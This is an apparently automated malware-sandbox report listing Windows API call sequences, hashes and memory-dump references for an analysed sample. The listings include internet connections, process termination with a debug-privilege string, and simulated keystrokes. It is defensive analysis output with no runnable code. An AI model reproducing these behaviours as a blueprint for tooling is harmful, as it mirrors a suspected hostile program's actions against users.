                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                              • String ID:
                                              • API String ID: 3992029641-0
                                              • Opcode ID: b3350169339a83166cb9f7001535ea52874201a2a4a87466c1865865e1cb199c
                                              • Instruction ID: 982967ce99919524a015077d988a54f993393924c7c24f41ce50251a7b4ca892
                                              • Opcode Fuzzy Hash: b3350169339a83166cb9f7001535ea52874201a2a4a87466c1865865e1cb199c
                                              • Instruction Fuzzy Hash: AD51AB70600206AFDB20DF25CC91FAA7BB5FF88750F144618F956A72E0DB71E990DB60
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DEC182
                                              • GetLastError.KERNEL32 ref: 00DEC195
                                              • SetEvent.KERNEL32(?), ref: 00DEC1A9
                                                • Part of subcall function 00DEC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DEC272
                                                • Part of subcall function 00DEC253: GetLastError.KERNEL32 ref: 00DEC322
                                                • Part of subcall function 00DEC253: SetEvent.KERNEL32(?), ref: 00DEC336
                                                • Part of subcall function 00DEC253: InternetCloseHandle.WININET(00000000), ref: 00DEC341
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                              • String ID:
                                              • API String ID: 337547030-0
                                              • Opcode ID: e02aab0f1c4202863ca2054fb58fcb83dc7b8a87c7a395583579ca82c6ff1b4b
                                              • Instruction ID: a22c4c591f825f0e08fb7b91729bd6dbe52c3bdcd77882b7c8c8402d33ba12e3
                                              • Opcode Fuzzy Hash: e02aab0f1c4202863ca2054fb58fcb83dc7b8a87c7a395583579ca82c6ff1b4b
                                              • Instruction Fuzzy Hash: 1031B071210B81AFDB21AFB6DC04A67BBF8FF18300B18551EFA9696610D731E856DB70
                                              APIs
                                                • Part of subcall function 00DD3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD3A57
                                                • Part of subcall function 00DD3A3D: GetCurrentThreadId.KERNEL32 ref: 00DD3A5E
                                                • Part of subcall function 00DD3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DD25B3), ref: 00DD3A65
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DD25BD
                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00DD25DB
                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00DD25DF
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DD25E9
                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00DD2601
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00DD2605
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DD260F
                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00DD2623
                                              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00DD2627
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                              • String ID:
                                              • API String ID: 2014098862-0
                                              • Opcode ID: 7ce1ff546b0a4f37869c96ef36a6e10c79361453a79c1cc77450a0ef6d9d16e7
                                              • Instruction ID: 26efbe28141f02a8d94ea044eb9ebe6a6e94486f0e7089930b88ed6ae1e8cd0d
                                              • Opcode Fuzzy Hash: 7ce1ff546b0a4f37869c96ef36a6e10c79361453a79c1cc77450a0ef6d9d16e7
                                              • Instruction Fuzzy Hash: 4401D830390210BBFB2067699C8AF593F69DB5EB11F200102F354BF1D1C9E354888ABA
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00DD1449,?,?,00000000), ref: 00DD180C
                                              • RtlAllocateHeap.NTDLL(00000000,?,00DD1449), ref: 00DD1813
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DD1449,?,?,00000000), ref: 00DD1828
                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00DD1449,?,?,00000000), ref: 00DD1830
                                              • DuplicateHandle.KERNEL32(00000000,?,00DD1449,?,?,00000000), ref: 00DD1833
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00DD1449,?,?,00000000), ref: 00DD1843
                                              • GetCurrentProcess.KERNEL32(00DD1449,00000000,?,00DD1449,?,?,00000000), ref: 00DD184B
                                              • DuplicateHandle.KERNEL32(00000000,?,00DD1449,?,?,00000000), ref: 00DD184E
                                              • CreateThread.KERNEL32(00000000,00000000,00DD1874,00000000,00000000,00000000), ref: 00DD1868
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                              • String ID:
                                              • API String ID: 1422014791-0
                                              • Opcode ID: 4cfd33aa37426ecd99c8aed4b715249a2bc24a1a1c02457ddc7e75f5227cdb30
                                              • Instruction ID: e5dde93b64b4b8e826c2d50c5a4d3c395c883de92d26488f37c4b137419ff282
                                              • Opcode Fuzzy Hash: 4cfd33aa37426ecd99c8aed4b715249a2bc24a1a1c02457ddc7e75f5227cdb30
                                              • Instruction Fuzzy Hash: FB01BF75241304BFE710AB65DC4DF573B6CEB89B11F104511FA05DB192C6759844CB20
                                              APIs
                                                • Part of subcall function 00DDD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00DDD501
                                                • Part of subcall function 00DDD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00DDD50F
                                                • Part of subcall function 00DDD4DC: CloseHandle.KERNEL32(00000000), ref: 00DDD5DC
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DFA16D
                                              • GetLastError.KERNEL32 ref: 00DFA180
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DFA1B3
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00DFA268
                                              • GetLastError.KERNEL32(00000000), ref: 00DFA273
                                              • CloseHandle.KERNEL32(00000000), ref: 00DFA2C4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 2533919879-2896544425
                                              • Opcode ID: 2390fb17140854b3b402e8644febe5acf291db1aef4f94b1dc6653782ecc1f61
                                              • Instruction ID: 24706cb32b6dc040b80108544ca64c3751e4e67f3a4dfe9aeb1103c3ee2f24cd
                                              • Opcode Fuzzy Hash: 2390fb17140854b3b402e8644febe5acf291db1aef4f94b1dc6653782ecc1f61
                                              • Instruction Fuzzy Hash: AF619E70205242AFD710DF19C494F29BBE1AF44318F1AC48CE56A4B7A3D776ED49CBA2
                                              APIs
                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E03925
                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00E0393A
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E03954
                                              • _wcslen.LIBCMT ref: 00E03999
                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E039C6
                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E039F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window_wcslen
                                              • String ID: SysListView32
                                              • API String ID: 2147712094-78025650
                                              • Opcode ID: 22f426b125665fc48a74a66eaad88b09ad6136130b0182d6bae698b935e42548
                                              • Instruction ID: db33d3564f4a366a51c5af9fe667f5e7da966d0bfb33200fe7917e8a0943eb53
                                              • Opcode Fuzzy Hash: 22f426b125665fc48a74a66eaad88b09ad6136130b0182d6bae698b935e42548
                                              • Instruction Fuzzy Hash: 0841AF71A00318ABEF219F64CC49BEA7BA9EF48354F101566F958F72C1D7719AC4CBA0
                                              APIs
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DDBCFD
                                              • IsMenu.USER32(00000000), ref: 00DDBD1D
                                              • CreatePopupMenu.USER32 ref: 00DDBD53
                                              • GetMenuItemCount.USER32(00FC5908), ref: 00DDBDA4
                                              • InsertMenuItemW.USER32(00FC5908,?,00000001,00000030), ref: 00DDBDCC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                              • String ID: 0$2
                                              • API String ID: 93392585-3793063076
                                              • Opcode ID: 2f737f08ae905b53852ed5115a09e83b7550bac50bb261fd960432845d8e30ac
                                              • Instruction ID: f0ed79ab7fb9c54dc5a1262ca01ae095afd7e58f72e328e1be7d434367980087
                                              • Opcode Fuzzy Hash: 2f737f08ae905b53852ed5115a09e83b7550bac50bb261fd960432845d8e30ac
                                              • Instruction Fuzzy Hash: 80519F70600205DBDB10CFA9D884BAEBBF6FF49328F29425BE442A7390E7709945CB71
                                              APIs
                                              • LoadIconW.USER32(00000000,00007F03), ref: 00DDC913
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: IconLoad
                                              • String ID: blank$info$question$stop$warning
                                              • API String ID: 2457776203-404129466
                                              • Opcode ID: 6072fd61a7c49b4c14cfeeae29b188204318257ac8ab765d6d2b8114eff4ef24
                                              • Instruction ID: bd21fa2dcb1a65d56e20707f37d3beb6556ff5784e5efc18ed90c66dfa1cf4be
                                              • Opcode Fuzzy Hash: 6072fd61a7c49b4c14cfeeae29b188204318257ac8ab765d6d2b8114eff4ef24
                                              • Instruction Fuzzy Hash: 6D113A32699307BBEB019B64DC93CAA279CDF15329F60502BF500B6382E7B1AE01D674
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen$LocalTime
                                              • String ID:
                                              • API String ID: 952045576-0
                                              APIs
                                              • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DC682C,00000004,00000000,00000000), ref: 00D8F953
                                              • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00DC682C,00000004,00000000,00000000), ref: 00DCF3D1
                                              • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00DC682C,00000004,00000000,00000000), ref: 00DCF454
                                              Similarity
                                              • API ID: ShowWindow
                                              • String ID:
                                              • API String ID: 1268545403-0
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 00E02D1B
                                              • GetDC.USER32(00000000), ref: 00E02D23
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E02D2E
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00E02D3A
                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E02D76
                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E02D87
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E05A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00E02DC2
                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E02DE1
                                              Similarity
                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                              • String ID:
                                              • API String ID: 3864802216-0
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              Similarity
                                              • API ID:
                                              • String ID: NULL Pointer assignment$Not an Object type
                                              • API String ID: 0-572801152
                                              APIs
                                              • GetCPInfo.KERNEL32(?,?), ref: 00DB15CE
                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00DB1651
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DB16E4
                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00DB16FB
                                                • Part of subcall function 00DA3820: RtlAllocateHeap.NTDLL(00000000,?,00E41444), ref: 00DA3852
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DB1777
                                              • __freea.LIBCMT ref: 00DB17A2
                                              • __freea.LIBCMT ref: 00DB17AE
                                              Similarity
                                              • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                              • String ID:
                                              • API String ID: 2829977744-0
                                              Similarity
                                              • API ID: Variant$ClearInit
                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                              • API String ID: 2610073882-625585964
                                              APIs
                                              • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00DE125C
                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00DE1284
                                              • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00DE12A8
                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DE12D8
                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DE135F
                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DE13C4
                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DE1430
                                              Similarity
                                              • API ID: ArraySafe$Data$Access$UnaccessVartype
                                              • String ID:
                                              • API String ID: 2550207440-0
                                              Similarity
                                              • API ID: ObjectSelect$BeginCreatePath
                                              • String ID:
                                              • API String ID: 3225163088-0
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00DF396B
                                              • CharUpperBuffW.USER32(?,?), ref: 00DF3A7A
                                              • _wcslen.LIBCMT ref: 00DF3A8A
                                              • VariantClear.OLEAUT32(?), ref: 00DF3C1F
                                                • Part of subcall function 00DE0CDF: VariantInit.OLEAUT32(00000000), ref: 00DE0D1F
                                                • Part of subcall function 00DE0CDF: VariantCopy.OLEAUT32(?,?), ref: 00DE0D28
                                                • Part of subcall function 00DE0CDF: VariantClear.OLEAUT32(?), ref: 00DE0D34
                                              Similarity
                                              • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                              • API String ID: 4137639002-1221869570
                                              APIs
                                                • Part of subcall function 00DD000E: CLSIDFromProgID.COMBASE ref: 00DD002B
                                                • Part of subcall function 00DD000E: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00DD0046
                                                • Part of subcall function 00DD000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DCFF41,80070057,?,?), ref: 00DD0054
                                                • Part of subcall function 00DD000E: CoTaskMemFree.COMBASE(00000000), ref: 00DD0064
                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00DF4C51
                                              • _wcslen.LIBCMT ref: 00DF4D59
                                              • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,?), ref: 00DF4DCF
                                              • CoTaskMemFree.COMBASE(?), ref: 00DF4DDA
                                              Similarity
                                              • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                              • String ID: NULL Pointer assignment
                                              • API String ID: 614568839-2785691316
                                              APIs
                                              • GetMenu.USER32(?), ref: 00E02183
                                              • GetMenuItemCount.USER32(00000000), ref: 00E021B5
                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E021DD
                                              • _wcslen.LIBCMT ref: 00E02213
                                              • GetMenuItemID.USER32(?,?), ref: 00E0224D
                                              • GetSubMenu.USER32(?,?), ref: 00E0225B
                                                • Part of subcall function 00DD3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD3A57
                                                • Part of subcall function 00DD3A3D: GetCurrentThreadId.KERNEL32 ref: 00DD3A5E
                                                • Part of subcall function 00DD3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DD25B3), ref: 00DD3A65
                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E022E3
                                                • Part of subcall function 00DDE97B: Sleep.KERNEL32 ref: 00DDE9F3
                                              Similarity
                                              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                              • String ID:
                                              • API String ID: 4196846111-0
                                              • Opcode ID: 4553eca0c9218c19ceda695e6746d8bdab931b2ca429d786f7309d2d3abd1cc8
                                              • Instruction ID: eaa34b890851000a847cce185857bd07e98abf031d49fdda1491c025571ee684
                                              • Opcode Fuzzy Hash: 4553eca0c9218c19ceda695e6746d8bdab931b2ca429d786f7309d2d3abd1cc8
                                              • Instruction Fuzzy Hash: 1071A135A00205AFCB10EFA4C845AAEB7F5EF88314F10945DE916FB391D735ED818BA0
                                              APIs
                                              • GetParent.USER32(?), ref: 00DDAEF9
                                              • GetKeyboardState.USER32(?), ref: 00DDAF0E
                                              • SetKeyboardState.USER32(?), ref: 00DDAF6F
                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00DDAF9D
                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00DDAFBC
                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00DDAFFD
                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00DDB020
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: 2e2d39e64a357eac1ec63e3e6e8014ad5eff325b8a879db63452d850105312ff
                                              • Instruction ID: 8648241d11b4d7c10ba7c3f9a3aacd9945cd506f3e3c93e6629acc857e64d216
                                              • Opcode Fuzzy Hash: 2e2d39e64a357eac1ec63e3e6e8014ad5eff325b8a879db63452d850105312ff
                                              • Instruction Fuzzy Hash: 1451E0A16046D17DFB3643388845BBBBEA99F06318F0C858BF1D9559C2C399ACC8D771
                                              APIs
                                              • GetParent.USER32(00000000), ref: 00DDAD19
                                              • GetKeyboardState.USER32(?), ref: 00DDAD2E
                                              • SetKeyboardState.USER32(?), ref: 00DDAD8F
                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00DDADBB
                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00DDADD8
                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00DDAE17
                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00DDAE38
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: 25a7caae09b63c7b6ae283e4659211910fed291a1ebe235fadbe46442f2e1f91
                                              • Instruction ID: 7303c175255fd97a745f3cccaa13961c6d3432e8f80318fb1f57e6fb2503a868
                                              • Opcode Fuzzy Hash: 25a7caae09b63c7b6ae283e4659211910fed291a1ebe235fadbe46442f2e1f91
                                              • Instruction Fuzzy Hash: 1D5104A16047D53DFB3283388C45B7ABFA99B46300F0CC58AF1D556AC2D295EC88E772
                                              APIs
                                              • GetConsoleCP.KERNEL32(00DB3CD6,?,?,?,?,?,?,?,?,00DA5BA3,?,?,00DB3CD6,?,?), ref: 00DA5470
                                              • __fassign.LIBCMT ref: 00DA54EB
                                              • __fassign.LIBCMT ref: 00DA5506
                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00DB3CD6,00000005,00000000,00000000), ref: 00DA552C
                                              • WriteFile.KERNEL32(?,00DB3CD6,00000000,00DA5BA3,00000000,?,?,?,?,?,?,?,?,?,00DA5BA3,?), ref: 00DA554B
                                              • WriteFile.KERNEL32(?,?,00000001,00DA5BA3,00000000,?,?,?,?,?,?,?,?,?,00DA5BA3,?), ref: 00DA5584
                                              Memory Dump Source
